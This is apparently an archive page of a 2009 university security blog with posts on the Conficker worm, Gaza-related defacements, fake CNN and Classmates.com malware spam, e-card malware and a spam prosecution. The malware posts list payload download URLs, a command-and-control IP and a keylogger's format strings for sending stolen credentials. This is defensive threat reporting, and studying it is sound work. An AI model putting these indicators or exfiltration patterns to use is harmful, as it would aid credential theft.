Sunday, January 25, 2009

Dear Santa (or, the American Recovery and Reinvestment Act of 2009)

Dear Santa,

We have been very good. Please send us $825 Billion worth of free stuff.

Sincerely Yours,

Congress


Turn on C-SPAN today and you can see that the above is the level of considered debate and opinion being given to the 625 page American Recovery and Reinvestment Act of 2009.

Still, if we're about to encumber $825 Billion of my children's funds, I thought it would be nice to see what Cyber, CyberCrime, and CyberSecurity Goodies might be waiting under the Christmas Tree.

For starters, we have the "Wireless and Broadband Deployment Grant Programs", established in section 6002 of division B of this Act, which will receive $2,825,000,000, of which $1,000,000,000 shall be for Wireless Deployment Grants and $1,825,000,000 shall be for Broadband Deployment Grants. I'd love to see the project plan and budget spreadsheets that came out to that nice round $1 Billion. (So, how much do we need to provide wireless access for everyone? Hmmm...when we add it all up it comes up to exactly $1 Billion. How convenient!)

Other things under Commerce Justice and Science that touch on technology:

Commerce


$650,000,000 for the Digital-to-Analog Converter Box Program

$100,000,000 for the National Institute of Standards and Technology for Scientific and Technical Research and Services.

$100,000,000 for "Industrial Technology Services", of which $30,000,000 shall be for Hollings Manufacturing Partnership.

$300,000,000 for "Construction of Research Facilities

$400,000,000 for the National Oceanic and Atmospheric Administration "for habitat restoration and mitigation activities"

$600,000,000 to NOAA for "accelerating satellite development and acquisition, acquiring climate sensors, and climate modeling capacity, and establishing climate data records."

Justice


$3,000,000,000 for the Edward Byrne Memorial Justice Assistance Grant Program.

$1,000,000,000 for Community Oriented Policing Services

State


$98,527,000 shall be available to State under the Comprehensive National Cybersecurity Initiative,

Health


$50,000,000 for "Public Health and Social Service Emergency Fund", to include Pandemic influenza preparedness, biomedical advanced research, Project BioShield, and Cyber Security.


Science


$400,000,000 to NASA, of which $250,000,000 shall be solely for accelerating the development of the tier 1 set of Earth science climate research missions.

$2,500,000,000 to the National Science Foundation for "Research and relate activities", with $200,000,000 earmarked for research facilities modification,

$400,000,000 more to NSF for "Major Research Equipment and Facilities Construction".

Energy


$18,500,000,000 for "Energy Efficiency and Renewable Energy" programs.

Social Security Administration


$400,000,000 for the contruction of a new National Computer Center

Testing of Health Information Technology


Section 4201. NIST - several new programs to develop more advanced health care technology.

Not much analysis here today, just thought these were some aspects of the Stimulus package that might be of interest to the readers here.

Oh - One other Cyber thing - throughout the bill, there is a requirement to document how funds are used by giving updates to the Internet website, "recovery.gov". I have to say that's a nice touch in the first legislation of the year -- here is the website where you MUST INFORM THE AMERICAN PEOPLE.

Monday, January 19, 2009

Downadup / Conflicker Worm: 8? 9? 10 Million Infected?

Its been quite a while since we've had a true run-away worm on the Internet, but if the claims of F-Secure are accurate, we've certainly got one on our hands now. At the end of this article are a list of the domain names ACTUALLY USED by the worm on January 13-16. The headlines have been ticking the number of infected machines forward for five days now, all based on F-Secure's successful monitoring of the worm via calculated domain names:

Jan 14 - Researcher: Worm infects 1.1 Million Windows PCs in 24 hours
Jan 15 - 2.5 million PCs infected with Conficker worm
Jan 15 - The Downadup Worm Hits 3.5 Million

Jan 19 - Fast spreading Windows virus already compromised 9 million computers
Jan 19 - Virus affects 10 million computers worldwide

The source for nearly every one of the thousands of media pieces about this worm has been F-Secure. In Friday's blog, they answered the many challenges about their methodology that they have received in their article Calculating the Size of the Downadup Outbreak. Briefly, each worm-infected computer has the ability to calculate a seemingly random domain name where it can receive new updates of the malware. There are as many as 250 possible domain names each day being calculated by the worm. As long as ANY of those domains are still live, the worm will be able to update itself to perform new functions. F-Secure has registered some of these domain names itself, and counts the number of infected computers which contact the domains it controls looking for an update. Each of the infected computers will show its IP address, as well as the number of computers which it claims to have infected itself. In a single day as many as 350,000 unique computers hit the domains controlled by F-Secure. Adding up the number of computers each of these computers claims to have infected -- and some are claiming more than 100 infections each -- is how F-Secure reaches its estimate, which they are calling conservative, knowing that many of the computers are choosing domain names other than their own with which to check in for an update.

The underlying vulnerability used to spread the Conficker worm was addressed by Microsoft with the patch MS08-067 back on October 23, 2008, the malware has only recently started a true run-away spread.

According to SC Magazine's Dan Kaplan, in his article No end in sight for massive Windows worm outbreak we haven't seen a worm this big since Nimda back in 2001.

Malware researchers report that the vast majority of the infected computers are on corporate networks, not home computers. There are two reasons for this:

As counter-intuitive as this sounds, many corporate networks have disabled the "automatic patching" that many home users have set as their default machine behavior. Because of a need for greater testing in corporate environments, many corporations believe it is acceptable to delay weeks or even months before applying recommended security patches from vendors. Any IT organization that willingly chose NOT to install this patch, after it was issued as a rare "emergency out of cycle patch" seriously needs to investigate whether their security staff needs training in Risk Management. HINT: If Microsoft breaks its Second Tuesday rule to issue a patch, they have performed the risk formla (Risk = Threats x Vulnerabilities x Value of Assets) and determined the Risk Is Very High!

Secondly, this is because the worm scans for a direct connection to the computer, rather than relying on human interaction. Most firewalls will actually block the worm, so the best way of catching it is to have an infected computer ON THE SAME SIDE OF THE FIREWALL as your machine. Because the other primary infection vector is an infected USB drive, employees who shuttle data back and forth to the house on a USB drive are often the Patient Zero for a corporate network outbreak. Once the worm arrives into an organization on an infected thumb drive, if the organization has not patched their machines, EVERY MACHINE IN THE CORPORATION is now an open target.

Because the worm can also spread by learning or guessing the Administrative password on network drives, organization that allow administrators to connect to every workstation machine on the network using the same administrative password share are especially vulnerable. As soon as the worm either guesses or learns via observation the Administrator password, every machine on the network can execute the worm code EVEN IF IT IS PATCHED! The Patch prevents the machine from being hacked via the Windows Server RPC Vulnerability. It does not prevent an Administrator from logging in to the machine and executing code, which is what the worm does if it correctly attempts a password. The Worst Case Scenario? A Domain Administrator visits an infected machine to try to disinfect it, sits down at the keyboard and logs in using his Domain Administrator password. As soon as that occurs, every machine on the network can be quickly compromised.

Computerworld's Gregg Keizer reported on January 15th that 1 in 3 Windows PCs remained vulnerable.

On the second Tuesday in January, the Microsoft Software Removal Tool was updated to be able to remove Conficker. You can follow the exploits of this worm and efforts to remove it at the Microsoft Malware Protection Center Blog and the F-Secure Blog.

A new Support article containing removal tips was released by Microsoft on January 15th: Virus alert about the Win32/Conficker.B worm.

The primary means for the virus to restart itself on an infected machine is the registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost

That key contains many critical Network Services which should be allowed to execute. If infected, the last entry on the list will be a key that was named with a random name generator. The example in Microsoft's article is "axyczbfsetg", but yours will be something different. There are many more steps to manual removal which can be found in the Microsoft support document above (KB 962007).

F-Secure has been posting lists of domain names which are being calculated by DownAdUp, their most recent list, for domains which would have been used over the weekend, contained exactly 1,000 domain names. 250 each for Jan 13, 14, 15, and 16. Rather than list all 1,000, I took the approach of running a WHOIS against each of the 1,000 domains on their list, and recording which ones were actually registered. So, here are the domains which ACTUALLY HAVE BEEN REGISTERED, out of the list of 1,000 potential names.

In all there were 57 domain names which had been registered out of the 1,000.

A tip of the hat to our friends at Georgia Tech, F-Secure, and Shadow Server, for reasons each will understand.

In what could be horrible news for certain domain name owners, five of the domains being automatically calculated on this list belong to actual domain owners. Apparently the malware's random domain calculator can randomly calculate some actual domains. Fortunately, of the domains thus affected only one is an actual company, (a German company, whose logs I would REALLY like to get my hands on!) while the other four seem to have been registered speculatively by domain investors. I've excluded all five from my results.

apleprodr.com
bbflvxif.info
cdmusnla.info
dxfvdadx.net
eonud.com
ezgcs.com
ezivhnbt.com
ffbnpzthj.info
ffvkwzear.org
fripjt.com
frwaqecvqk.info
fwotu.net
ggjdty.info
gkmwym.org
hhnvxjdms.info
hrypbb.info
hxgtuopbf.org
hxvyowd.info
ilklkc.net
jjydznuzxu.info
jrxgtdigb.info
jtpigznr.info
ktfadsqo.info
kxxqz.net
mirxdkbat.com
mkdjqosakje.net
mkfugrbowb.info
mrrdzwsz.biz
nmftyate.com
nsuzsjrp.info
pitoy.net
pvczx.info
qowte.com
qpqhcz.net
qqncaz.com
rofxb.net
ruvyhtdzdkm.info
rzowqlvco.com
tqreftcjgzm.info
vggdbocd.biz
vwmwpcs.info
wfivi.com
whtex.com
wshazbuck.cn
wvmsa.info
xhuwvozd.info
ybgcjpnzts.info
yeeollvintx.org
yykad.net
yzdmh.net
zbiqa.com
zullc.com
zwedpmoa.info

If any of those sites are in your logs for the past four days, Congratulations, and welcome to Conflicker.

Thursday, January 08, 2009

US Army hacked as Gaza protest

Today the anti-Israeli hackers for the first time brought their Cyber Propaganda War to Washington DC in the form of their attack against the United States Army's Military District of Washington website, www.mdw.army.mil

The defaced website can still be seen via Google's cache:





What is MDW?

MDW encompasses Fort Myer, Fort McNair, Fort Belvoir, Fort A.P. Hill, Fort Meade, Fort Holabird, Fort Ritchie, 12th Aviation Battalion at Davison Army Airfield, and Arlington National Cemetery.Mission is to respond to crisis, disaster, or security requirements in the National Capital Region (NCR), provide base operations support for Army and DoD organizations throughout the NCR, conduct official ceremonies, locally and worldwide, on behalf on the nation's civilian and military leaders.

According to Zone-H, websites that were hit by the group included:

soa.mdw.army.mil
mdw.army.mil
mdwweb.mdw.army.mil

They also hit the Italian UNICEF website, and the website www.nato-pa.int, the NATO Parliamentary Assembly website in Brussels, Belgium.

In recent months the group also defaced websites belonging to anti-virus vendors Eset and Nod32, as well as Microsoft's websites in Canada, Ireland, and China; Mercedes Benz, Subaru, Mitsubishi, Fiat, Aston Martin, and Shell; Harvard University, Goodyear, the NBA, and other high profile targets.

Although the group is now calling themselves "Peace Crew", the same membership was calling itself "Terrorist Crew" as recently as December.

In addition to the army.mil sites above, Agd_Scorp also defaced the website www.jfhqncr.northcom.mil. On a Turkish language website, the attack is claimed to be an SQL Injection attack against an ASP page on a Microsoft IIS 6.0 webserver.

This is the "Joint Force Headquarters, National Capital Region, of the Northern Command. Prior to the website being taken offline as a result of the hacking, the page read like this:

On Sept. 11, 2001 no one believed the National Capital Region would be a target for those who wish to do us harm. As a nation, we found that to be false. In direct response to the events of that fateful day, JFHQ-NCR was established as the responsible headquarters for land-based homeland defense, defense support to civil authorities and incident management in the national capital region. We have unique skills and are prepared to defend people, territory, critical infrastructures and sovereignty in a supporting role to a lead federal agency.

On a 24/7 basis JFHQ-NCR monitors security requirements; coordinating with the military services, the Department of Homeland Security and local first responders in identifying capabilities the military can provide in case of an emergency or National Special Security Event (NSSE). Once an event is designated, the command becomes a Joint Task Force-National Capital Region (JTF-NCR). JTF-NCR then directs military assistance to federal and civil authorities in safeguarding the nation’s capital.

Gaza Conflict spam points to Fake CNN Infection site

Beginning at 7:30 this morning, the UAB Spam Data Mine began receiving emails claiming to have news about the Gaza conflict from CNN News.



(A typical email)

Each of the many emails we've received points to a website that looks like this:




(click for larger image)

All of the links on the website are functional, and all really resolve to the real CNN website, with two exceptions. Attempting to play the video will result in the download of malware, and following the Adobe Player button will also result in the download of malware.

During the summer of 2008, one of the most successful spam campaigns of the year also imitated a CNN news story, leading to many home and business computers being infected by a virus.

At this time, many major anti-virus products still do not detect this malware as a virus. According to this Virus Total report only 11 of 38 anti-virus products will trigger on this file as containing a virus. (Follow the link to see if your product does or does not.)

The spam messages refer visitors to one of five different domains, each of which was registered at BizCN.com, a Chinese domain registrar who has been abused by this particular group for many months. Analysis of the malware confirms that this incident has nothing at all to do with the CyberWar being waged by pro- and anti-Israeli hackers. This is instead pure social engineering.

Just as with the many "online banking videos", the "digital certificate malware", the "Fake Bank Merger malware, yesterday's "Classmates.com reunion video", and the fake "Obama acceptance speech, this is a piece of malware which is designed to steal your passwords and send the stolen information to the criminal's server in the Ukraine, which is currently 91.211.65.30.

UAB Student and Malware Analyst, Brian Tanner, examined the Adobe_Player10.exe malware and identified that it causes your computer to download a second piece of malware from http://powerpekin.com/servicepack1.exe. That malware, which has the MD5 of 1f337515a3e96fd317dfb24e9fe67448, was only detected by 2 of 38 products at Virus Total. He then unpacked the servicepack1.exe malware and examined it to determine the stolen data was being sent to 91.211.65.30.

The domains used by this spam include:

downloadplayersnews.com
installflashadobeplaye10.com
newsinstalls.com
startinstalladobe.com

As with yesterday's ClassMates.com incident, the websites are being hosted via Fast Flux hosting, and the same fast flux hosts are being used for phishing as well, currently against MBNA bank and Sparkasse of Germany.

The false registration information provided on the domains claims that an imaginary employee of the BBC (Monnie Moulhem) residing in Spring Hill Florida registered the domains.

The computer which is being used as the "Nameserver" for these malware distribution domains resides at 74.63.217.81 -- which is the same computer which served as the nameserver for yesterday's Classmates.com malware.

While we know that many other subject lines will be used as the campaign progresses, some that we have seen so far include the subject lines:

Gaza emergency - UNICEF
Gaza Groups Report on War
Gaza: Israeli War Crimes?
In what became known as Israel's War of Independence
Israel Assaults Hamas in Gaza
Israel At 'War to the Bitter End,' Strikes Key Hamas...
Israel launches deadly Gaza attacks
Israel Puts War Footage
Israel warns Gaza of impending invasion - Israel-Palestinians ...
Israel: Preparing for War
Israel-Gaza conflict: Tens of thousands in London protest Gaza ...
IsraelGaza Strip barrier
Israeli war strategy.IDF in urban combat.
Israel's War Crimes
Israels War on Hamas:A Dozen Thoughts
News from Israel,Ynetnews - Israel at War
Now Israel declares 'war to the bitter end' - Middle East, World ...
Religious war in Gaza - Israel Opinion, Ynetnews
The 20072008 Israel-Gaza conflict refers to a series of battles between Palestinian militants

Tuesday, January 06, 2009

A New Year and Anti-Virus Products Are Still Losing

One of our most popular blog posts in 2008 was back in August - Anti-Virus Products Still Fail on Fresh Viruses. I'm sad to report that in the New Year the situation is not just bad - its worse.

My students are back from the holidays, and I couldn't be happier! Tomorrow night I have 14 new graduate students who I'll be meeting in my Computer Security class where I teach at the University of Alabama at Birmingham. But this analysis was by one of my undergraduate research students who works on malware analysis for me.

Although the volume is greatly reduced from Christmas and New Years, we are continuing to see a regular flow of "eCards" into the UAB Spam Data Mine. Today's domain name of choice was "smartcardgreeting.com". The website hasn't changed since what I showed in the January 3rd post - Happy New Year! Here's a Virus! - but the malware is much less detectable.

How bad? Only ONE of thirty-nine products at VirusTotal.com was able to detect this malware as being a bad file:



The other malware he analyzed today was a fake ClassMates.com malware. ClassMates.com has been targeted on and off for most of the month of December with a spam message claiming to have a video for you to review. Of course the video doesn't actually play and instead prompts you to download a program which claims to be an AdobePlayer.

There were actually two separate groups of five domains involved in this attack.

adobflashplayer10.com
installadobereader.com
installcashion.com
newflasplayerforcm.com
newgoodclassmates.com


and

flashplayerforwindows.com
flashsiters.com
installationsflash.com
newsflashbbc.com
windowsflashplayer10.com

The latter group was registered on TodayNic.com, and used the Nameserver NS1.NEWHOSTINGFORUS.COM.

Each of which had a page called "reunion2009.htm" which contained the fake video, and the malware downloader and looked like this:



All of the sites were registered with the Chinese domain registrar, BizCN.com, and each used the same nameserver, NS1.AVAILABLEREG.COM.

The first piece of malware, Adobe_Player10.exe, actually has a mediocre detection rate of 16 out of 39 VirusTotal detections. Unfortunately, the only function of this malware is to drop the REAL malware, which is being downloaded from the site:

shangaicons.com/22.exe

22.exe is "double-packed", where the hacker takes his virus, packs it with a packer to avoid undetection, and then takes the results and packs them with a different packer as well. It resulted in a very hard to detect piece of malware, as evidenced by the fact that only ONE of 39 anti-virus products were able to detect this as well:



My student malware analyst was able to successfully unpack the 22.exe malware, and found that it is a root-kitted keylogger, in the same family we've been seeing. It steals passwords from your computer as you type them, and sends them with patterns like this:

C:\Program Files\Internet Explorer\iexplore.exe
http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&version=%lu&crc=%.8x
URL: sniffer_ftp_%s
ftp_server=%s&ftp_login=%s&ftp_pass=%s&version=%lu
URL: sniffer_pop3_%s
pop3_server=%s&pop3_login=%s&pop3_pass=%s
URL: sniffer_imap_%s
imap_server=%s&imap_login=%s&imap_pass=%s
URL: sniffer_icq_%s
icq_user=%s&icq_pass=%s

to the Ukrainian IP address:

91.211.65.30

which we first reported seventeen days ago and asked for termination.

We saw about 375 copies of the ClassMates.com email today, with a wide assortment of subject lines, including:
  • Accomplishments by classmates and reunion information
  • Alumni Events: Classmates
  • An Invitation to Personal Classmates Day
  • Bringing Classmates Together January 2009
  • Classmates - ALUMNI Reunion Calendar
  • Classmates - Calendar 2009
  • Classmates - Custom Invitations
  • Classmates 2009 January - Invitation
  • Classmates Alumni Event Calendar
  • Classmates Day - January 2009.
  • Classmates Important Meeting Information
  • Classmates in January - Invitation to All Faculty to the Spring 2009 ...
  • Classmates in January...Invitation! - Page 1
  • Classmates Institutional Membership Invitation
  • Classmates International Honour Society Invitation Acceptance
  • Classmates invitation - Reunion party Greeting Card.
  • Classmates Membership Invitation
  • Classmates Membership Invitation from teachers
  • Classmates Message Boards
  • Classmates Organisation.Class Reunion Information
  • Classmates Organiser Warning - AN URGENT MESSAGE - Your Classmates Are Waiting
  • Classmates Organiser Warning - Classmates Organisation.Have any special memories from when we were in high school?
  • Classmates Organiser Warning - Don't Miss Tonight's Classmates Reunion !
  • Classmates Organiser Warning - How can someone miss a Classmates meeting?
  • Classmates Organiser Warning - How to Hold A Class Meeting And Promote Classmate Support
  • Classmates Organiser Warning - Meeting high school and junior college classmates
  • Classmates Organiser Warning - Webster meetings among former classmates
  • Classmates Party invitation...
  • Classmates Personal Invitation: Custom invitation
  • Classmates Preview, public invitation
  • Classmates Reunion - Invitation
  • Classmates Reunion - Are you ready to accept the invitation?
  • Classmates Reunion - Classmates Reunion - Special Preview Invitation
  • Classmates Reunion - Custom Invitations
  • Classmates Reunion - Invitation: Ready
  • Classmates Reunion - Personal Invitation Letter to visit Classmates Day
  • Classmates Reunion - Personalized Invitations
  • Classmates Reunion - Ready to view your Classmates Invitation?
  • Classmates Reunion - Your Classmates Invitation - He's Ready, Are You?
  • Classmates Reunion Calendar
  • Classmates Reunion Soon - [Class Reunion] Save the Date
  • Classmates Reunion Soon - All your classmates receiving invitations!
  • Classmates Reunion Soon - classmates meeting
  • Classmates Reunion Soon - Classmates Organisation.What Have You Been Up To
  • Classmates Reunion Soon - ClassMates.com about meeting classmates
  • Classmates Reunion Soon - Important Dates for Classmates Meeting
  • Classmates Reunion Soon - Mini-Reunion / Meeting with Classmates
  • Classmates Reunion Soon - UPDATE: Reunion Date Change
  • Classmates Reunion Soon - Video
  • Classmates Reunion Soon - You Have 1 Message Waiting for You. Classmates portal
  • Classmates Reunion Soon - Your Classmates Are Waiting to meet with you
  • Classmates Reunion Soon - Your classmates Day New Date.
  • Classmates Reunion Soon - Your classmates Day New Date..How can someone miss a Classmates meeting?
  • Classmates Reunion Soon - Your classmates Day New Date.Important Dates for Classmates Meeting
  • Classmates Video your personal invitation by John
  • Classmates/com: HappyScrappers January Invitation
  • Classmates/com: January is the time to learn at a low cost
  • Classmates: Be ready for Reunion Day.
  • Classmates: custom invitations 2009
  • Classmates: Display your invitations from your profile
  • Classmates: Invitation Design 2009
  • Classmates: Membership Invitation - American Studies Association
  • Classmates: Membership Invitation. 2009 season
  • Classmates: View Your Invitation - Click Here
  • Classmates: View your personal invitation video from Chris O'Malley
  • Classmates: Your complete invitation is viewable for 30 days after the event.
  • Classmates: Your Invitation Place
  • Classmates: your invitation to a private view
  • Do not miss the Classmates reunion
  • Do-Not-Miss Classmates reunion.
  • Events Calendar : Classmates
  • Friends waiting for your visit! Classmates
  • Get all of your classmates together Day - January 2009
  • Important Classmates Day's 2009
  • Invitation to the Classmates - January 12th | Earth ...
  • January - Classmates/com
  • January 16, 2009: Deadline for Classmates Invitation
  • January Invitation. Classmates
  • January Invitations, Classmates Invitations, Online ...
  • My Classmates news
  • Reconnect with your MBA classmates and favorite teachers
  • Search for Classmates
  • Spam Accomplishments by classmates and reunion information
  • The power of a personal invitation - Classmates
  • Traditional January Invitations, Classmates Party ...
  • Use Classmates.com to bring class together.
  • Welcome to Classmates Personal Invitation
  • Your Classmates Are Waiting. Classmates Invite all friends.
  • Your Classmates Are Waiting.Look an invitation.
  • Your classmates Day New Date.A Meeting with my HighSchool Classmates
  • Your classmates Day New Date.Important Meeting for Classmates
  • Your classmates Day!
  • Your classmates will be able to find your
  • Your High bring classmates together.



(The previous batch of domains, including "classmatersunion.com, indexguideclassmates.com, renewclassmates.com" all used the nameserver, NS1.GOODNEWYEARHOSTING.COM)

The Classmates malware domains are hosted by Fast Flux, and are using the same Fast Flux network as the current MBNA phishing sites, such as bankcardservices.mbna.co.uk.dlls-id01.eu.

Sunday, January 04, 2009

Whatever happened to Alan Ralsky?

One year ago, the indictment was unsealed against Alan M Ralsky, Scott K Bradley, Judy M Devenow, John S Brown, William C Neil, Anki K Neil, James E Bragg, James E Fite, Peter Severa, How Wai John Hui, Francis A Tribble.

As we review some of the biggest "wins" against spammers, phishers and cyber criminals in 2008, everyone's list starts with Ralsky. On January 3, 2008, the forty page indictment against Alan Ralsky was unsealed. We reported on the indictment in our January 3, 2008 blog entry: Ralsky: Going Down.

But what happened since?

After acknowledging his indictment, on January 9, 2008, Ralsky was released on $50,000 bail.

A notice to appear was issued on January 29, 2008, asking Ralsky and friends to appear before the Honorable Marianne O Battani on March 17, 2008 for a Pretrial Scheduling Conference.

On March 17, 2008 that conference was rescheduled until June 17, 2008.

On June 17, 2008 that conference was rescheduled until October 21, 2008.

Wait! What about the "Speedy Trial Act"? Well . . . there were ELEVEN people indicted originally. As of June 17th, two of the eleven had not appeared before the court to be arraigned. (Peter Severa had not appeared, because he lives in Russia and was never arrested, and for almost exactly the opposite reason, Francis Tribble had not appeared because he was in jail in Los Angeles County and they hadn't transported him yet.) Because of this, the parties involved decided "the 70-day
time period under 18 U.S.C. § 3161(c)(1) has not yet commenced."

At the first conference, it was decided that the "lengthy electronic discovery" which had resulted in vast mountains of electronic evidence which had not yet been processed to the point of fully understanding what was at hand. At the second conference, it was "indicated that an additional 120 days would be needed to allow for the extraction and examination of the computer evidence by the defendants."

In other words, the defense was saying, because you have so much evidence against our client, we haven't had time to go through it all yet. (Which is either a stall tactic, or an indication of poor technology, which do you believe? I believe both are probably true.) Oh, and that means:

The parties do therefore agree and stipulate that the period of time from June 17, 2008 through October 28, 2008, shall be excluded from the time computation of the 70-day Speedy Trial period, due to the absence of defendant Tribble, and also due to the need for the parties to effectively manage the extensive electronic discovery presented in this unusual and complex case, because the ends of justice served in taking such action outweighs the best interest of the public and the defendants in a speedy trial, under 18 U.S.C. § 3161(h)(8)(B)(ii).


The following lawyers, all representing the spammers, signed off on that statement:

For Alan Ralsky - Philip Kushner of Kushner & Hamed Co, Cleveland, Ohio
For Scott Bradley - Neil Fink of Birmingham, Michigan
For Judy Devenow - Richard Zuckerman of Honigman Miller Schwartz & Cohn, Detroit
For John Bown - Mark Kriger of LaRene & Kriger, Detroit
For William Neil - Michael Kemnitz, Detroit
For Anki Neil - John McManus, Birmingham, Michigan
For James Fite - Andrew Wise, Federal Defender Office, Detroit
(Peter Severa - not arraigned)
For How Wai John Hui - Avery Mehlman of Herrick, Feinstein, New York
For James Bragg - Robert Morgan of Detroit
For Francis Tribble - Marcia Morrisey

Lawyers for the prosecution:
Terrence Berg, Assistant US Attorney (my favorite AUSA in the whole system)
Thomas Dukes, DOJ Computer Crime and Intellectual Property Section Trial Attorney
Mona Sedky Spivack, CCIPS Trial Attorney

On August 12, 2008 there was a hearing regarding joint representation for Ralsky and Bown (it was denied).

On September 18, 2008 Ralsky's bond conditions were altered to allow him to travel anywhere in the United States as long as he provides prior notification to Pre-Trial Services and the US Attorney's Office.

The October 12, 2008 Pre-Trial conference got rescheduled to November 10, 2008.

At that time, they got down to business, and released the Order to Continue on November 19, 2008. Here's the new gameplan:

Feb 27, 2009: All Discovery must be completed
March 31, 2009: All Pre-Trial Motions are due
April 21, 2009: All Responses to Motions are due
May 12, 2009: Motion Hearing scheduled for 2 PM
May 12, 2009: If no motions, pleas are due at this time

Sep 9, 2009: Jury Trial Begins

For some in the Anti-Spam Community, this seems like a LOOOOOONG time for Justice, especially given that Ralsky is traveling the US as a free man until then.

This concludes our "Whatever happened to Alan Ralsky" status report.

Saturday, January 03, 2009

Happy New Year! Here's a Virus! (New Year's Postcard malware)

I've been busy this week looking at the various defacements (see ComputerWorld, and ABC News) and other cyber attacks (see yesterday's blog) going on against Israel, so I hadn't had a chance to look at my New Years Cards yet!

Sadly, all of my New Years Cards were viruses (although I did get two real Christmas Cards by email.)

The most recent ones I looked at arrived this morning, pointing me to the websites:

bestyearcard.com
youryearcard.com

I decided to see what computers were currently hosting the website "youryearcard.com", because, sure enough, it was hosted with Fast Flux.

24.24.70.135
61.24.107.220
66.178.64.133
67.9.192.176
69.47.115.180
86.200.201.148
88.179.125.249
98.230.55.8
131.113.162.29
160.36.19.235
217.210.150.100
221.214.134.26

were some of the computers which recently hosted this domain name. Next we looked at some of those IPs to see what other domains they had also been hosting:

blackchristmascard.com
cardnewyear.com
decemberchristmas.com
directchristmasgift.com
freechristmasworld.com
freechristmassite.com
freedecember.com
funnychristmasguide.com
holidayxmas.com
itsfatherchristmas.com
livechristmascard.com
newlifeyearsite.com
newyearcardcompany.com
newyearcardfree.com
newyearcardonline.com
superyearcard.com
whitewhitechristmas.com
yourchristmaslights.com
youryearcard.com

All of those sites seem to have been distributing malware pretending to be a card. They are all related to each other (based on the fact they resolve to the same hacked computers.)

The New Years site that we visited just now looks like this:



Although that looks like a website, it turns out the entire thing is a single file called "img.jpg". Clicking anywhere on the image causes the same result - you are prompted to download "postcard.exe".

postcard.exe is of course a virus. We submitted the virus to Virus Total, and got this Virus Total Analysis indicating that only 16 of 38 anti-virus products knew this was malware. Most of them called it either a version of "ElDorado", or gave it a new name of "Waledac", the latter being the name used by McAfee, Microsoft, and Symantec.

McAfee has a Nice Technical Report on what Waledac does, but basically it harvests all of the email addresses from your computer, sends them to one of many different machines, downloads some spam templates, and begins sending spam.

McAfee's report is from December 26th, and includes subject lines such as:

Merry Christmas greetings for you
You have received an Ecard
A Christmas card from a friend
Happy Xmas !

The domain names listed in the McAfee report of December 26th are all still live and all still distributing the current version of the virus, which has been modified many times since that report to try to prevent detection. So, visting:

justchristmasgift.com
or
yourdecember.com

gives you the same virus that visiting the current New Years domains would give you.

I know you are probably getting tired of this advice, but it still applies:

DO NOT CLICK ON LINKS IN EMAIL MESSAGES!!!

My malware team is still enjoying their vacation. If this is still a threat on Monday, we'll dig deeper to determine if the malware performs other actions.

In the meantime, Happy New Year!

Gary Warner
Director of Research
UAB Computer Forensics
The University of Alabama at Birmingham

Friday, January 02, 2009

Morocco based "Team Evil" reroutes prominent Israeli websites

After more than 10,000 websites being defaced in protest of Israeli actions in Gaza, Morrocco-based defacement team "Team Evil" has raced the cyber attack to a new level. By logging in the Internet registration services provider, Domain The Net Technologies, using the real credentials of the domain owner, the hackers were able to redirect traffic for several prominent Israeli websites, including that of YnetNews.com, a major Israeli English-speaking news website, and the website "www.israirairlines.com". This blogger also found evidence that the site "terrorism-info.org.il" was also rerouted to the same location. Terrorism-info is a site showing the "Operation Cast Lead" from the Israeli point of view.

Anyone entering the actual address of YnetNews during this time would not be sent to the real webserver, but instead be redirected by the fake DNS server to another server, displaying the hacker's message.

The website read:

Hacked by JURM-TEAM & CYBER-TERRORIST & TEAM-Evil

Lpooxd@gmail.com & Cyb3rt@hotmail.com

The Bitter Truth History repeats itself all the victims were said to words such as "terrorists" and the only reason for those words and that the overwhelming offender and murderer was a stronger force, but will not last, and the criminals will be rotting in hell and can not escape the punishment of God

Holocaust :Victims (the Palestinians) - the offender (the Zionists) # are still ongoing #
Holocaust :Victims (the Iraqis) - the offender (U.S. military) # are still ongoing #

There are many images that continue to occur, but you learn from history?!
* * *
The only solution for peace for all peoples in Palestine, Jews and Muslims and Christians is the demise of the Zionist and that the treatment of malignant cancer tumor
Look at the result of X-Ray for tumor, and they will learn that they do not want the peace, it is a dirty game of global
..... Machine Closed....................
........................................................................................................................................................................................................................................

We Are : Jurm / Cyber-terrorist / Dr.Noursoft / Dr.Win / Sql_Master / J3ibi9a / Scritpx // Fatna Bant Hmida

" Greetz : All Muslims Hackers "


(Images are not included above. The images included covered bodies, a scene from Abu Grhaib prison, a protestor with a sign against Zionism, and a series of maps showing the loss of land by Palestinians)

During the attack, the YNetNews web address was being resolved by the nameserver "ns1.bestsecurity.jp". To its credit, YNetNews actually ran a story about the attack on its own website. Unfortunately both Lebanese and Israeli media sources have reported that the traffic was being rerouted to Japan. This is actually not correct. The IP address for ns1.bestsecurity.jp is 64.38.30.146, which is actually located on Fast Servers in Chicago, Illinois. The machine to which the traffic was being redirected, 64.38.30.147, was also at Fast Servers in Chicago, Illinois.

This is not the first time the YNetNews website has been hacked in response to Israeli actions. The website was also defaced back on July 5, 2008 by a hacker group calling itself "Jurm-Team". At that time the website showed a Syrian flag, and had a headline reading "Syria: End Israeli Aggression".

Although it has been speculated that the way such an attack would be performed is that the password used to login to the domain registration server would have been stolen. One common way to steal such information is to plant a trojan on a computer belonging to a target. The YNetNews story mentioned above actually interviewed Yoav Keren, CEO of DomainTheNet Technologies, who confirmed that Team Evil hackers had breached their server and was able to find the passwords used by various domain registration customers, allowing the hackers to then log in as the domain owner and re-route their DNS servers as described above. (The breach has since been closed).

Thursday, January 01, 2009

2008: Looking back on a Year of Spam and Malware

Happy New Year! As we get ready for the New Year, there are quite a few security folks making predictions for 2009. I think my friend Dan Clemens covered that pretty well in his PacketNinjas Yearly Security Predictions. I'm going to limit myself to saying the criminals will continue to innovate, data breaches will become even more commonplace, and corporate America will continue to TALK about security without making the necessary fundamental changes to actually BE secure.

I'd rather spend this morning looking back on 2008, and some of the highlights that we discovered at UAB Computer Forensics as I and my staff spent the year analyzing spam, phishing, and malware and sharing what we found with you.

Last year we shared 102 Blog entries with you. Rather than tell you what *I* thought was most interesting, I thought I'd share with you what *YOU* seemed to think was the most interesting, based on the visits to each blog entry.

We'll hit these Top Ten Style . . . which means we start with . . .

Number Ten


Internet Landfill McColo Corporation


November 12, 2008

